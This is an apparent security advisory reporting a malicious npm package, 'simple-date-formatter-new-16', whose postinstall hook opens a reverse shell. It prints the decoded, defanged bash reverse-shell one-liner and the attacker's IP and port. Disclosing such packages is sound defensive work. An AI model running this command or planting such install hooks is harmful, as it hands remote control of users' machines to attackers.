LWA-2026-12381 MAL-2026-17162 ↗ confirmed malware

simple-date-formatter-new-16@1.0.0

Malicious code in simple-date-formatter-new-16 (npm)

T1059.004 · Unix ShellT1059.007 · JavaScriptT1071.001 · Web Protocols

Analysis

The postinstall hook executes a reversed-string bash command that decodes to `bash -i >& /dev/tcp/124[.]221[.]154[.]135/4444 0>&1`, opening an interactive reverse shell to 124[.]221[.]154[.]135:4444 on the installer's machine at install time. The package is a trivial date-formatter stub with no legitimate reason to open a network shell.

analyzed by
Leitwacht
first seen
Sep 24, 2026, 08:09 AM
analyzed
Sep 24, 2026, 08:10 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.